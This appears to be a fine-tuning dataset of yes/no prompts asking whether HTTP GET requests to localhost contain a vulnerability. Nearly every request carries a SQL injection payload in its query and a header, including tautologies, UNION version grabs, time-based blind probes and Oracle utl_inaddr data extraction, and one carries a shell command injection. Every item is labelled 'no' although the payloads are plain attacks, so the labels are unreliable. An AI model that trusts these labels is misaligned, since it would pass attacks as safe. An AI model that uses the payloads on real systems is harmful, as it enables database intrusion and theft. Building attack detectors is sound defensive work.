"Test-Header": " select * from users where id = '1' union select ( \. ) ,@@VERSION -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=or 1 = 1--",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "or 1 = 1--"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=1 or pg_sleep ( __TIME__ ) --",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "1 or pg_sleep ( __TIME__ ) --"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or ",#" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or ",#" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=admin' ) or ( '1' = '1'/*",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "admin' ) or ( '1' = '1'/*"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=or 2 between 1 and 3",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "or 2 between 1 and 3"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or " ) ." = 1 or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or " ) ." = 1 or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or 1#". union select null,version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or 1#". union select null,version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=admin' or '1' = '1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "admin' or '1' = '1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=; if not ( select system_user ) <> 'sa' waitfor delay '0:0:2' --",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "; if not ( select system_user ) <> 'sa' waitfor delay '0:0:2' --"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 union select 1,banner from v$version where rownum = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 union select 1,banner from v$version where rownum = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=" or 0 = 0 --",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "" or 0 = 0 --"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 union select @ $_,version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 union select @ $_,version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = 1 <@.$ or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = 1 <@.$ or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or "%." or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or "%." or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or ",." or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or ",." or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=char%4039%41%2b%40SELECT",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "char%4039%41%2b%40SELECT"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or "1&" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or "1&" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=admin' ) or ( '1' = '1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "admin' ) or ( '1' = '1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=declare @s varchar ( 200 ) select @s = 0x73656c6 ...",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "declare @s varchar ( 200 ) select @s = 0x73656c6 ..."
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=or 0 = 0 #"",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "or 0 = 0 #""
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or ".]" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or ".]" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= ) or ( 'x' = 'x",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " ) or ( 'x' = 'x"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1.<@$ union select 1,version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1.<@$ union select 1,version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=$ ( sleep 50 ) ",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "$ ( sleep 50 ) "
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 *1 union select null,banner from v$version where rownum = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 *1 union select null,banner from v$version where rownum = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or 1#". union select 'a',version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or 1#". union select 'a',version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or 1#"; union select null,version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or 1#"; union select null,version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or 1#"? or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or 1#"? or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test="a"" or 1 = 1--"",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": ""a"" or 1 = 1--""
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 4 ) ) AND 'i' = 'i",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 4 ) ) AND 'i' = 'i"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' union select ( \ ) ,@@VERSION -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' union select ( \ ) ,@@VERSION -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=1 and user_name ( ) = 'dbo'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "1 and user_name ( ) = 'dbo'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=; if not ( substring ( ( select @@version ) ,24,1 ) <> 1 ) waitfor delay '0:0:2' --",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "; if not ( substring ( ( select @@version ) ,24,1 ) <> 1 ) waitfor delay '0:0:2' --"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or 1#"$ union select 1,version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or 1#"$ union select 1,version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or 1#"{ union select null,version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or 1#"{ union select null,version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = '1' *$ . or 1 = 1 -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = '1' *$ . or 1 = 1 -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = 1 +$+. or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = 1 +$+. or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = 1 or ( \+ ) = 1 or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = 1 or ( \+ ) = 1 or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 6 ) ) AND 'i' = 'i"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=or 1 = 1 or '' = '",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "or 1 = 1 or '' = '"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = 1 or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = 1 or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
End of preview. Expand
in Dataset Viewer.
Dataset Card for Dataset Name
This dataset card aims to be a base template for new datasets. It has been generated using this raw template.
Dataset Details
Dataset Description
- Curated by: [More Information Needed]
- Funded by [optional]: [More Information Needed]
- Shared by [optional]: [More Information Needed]
- Language(s) (NLP): [More Information Needed]
- License: [More Information Needed]
Dataset Sources [optional]
- Repository: [More Information Needed]
- Paper [optional]: [More Information Needed]
- Demo [optional]: [More Information Needed]
Uses
Direct Use
[More Information Needed]
Out-of-Scope Use
[More Information Needed]
Dataset Structure
[More Information Needed]
Dataset Creation
Curation Rationale
[More Information Needed]
Source Data
Data Collection and Processing
[More Information Needed]
Who are the source data producers?
[More Information Needed]
Annotations [optional]
Annotation process
[More Information Needed]
Who are the annotators?
[More Information Needed]
Personal and Sensitive Information
[More Information Needed]
Bias, Risks, and Limitations
[More Information Needed]
Recommendations
Users should be made aware of the risks, biases and limitations of the dataset. More information needed for further recommendations.
Citation [optional]
BibTeX:
[More Information Needed]
APA:
[More Information Needed]
Glossary [optional]
[More Information Needed]
More Information [optional]
[More Information Needed]
Dataset Card Authors [optional]
[More Information Needed]
Dataset Card Contact
[More Information Needed]
- Downloads last month
- 21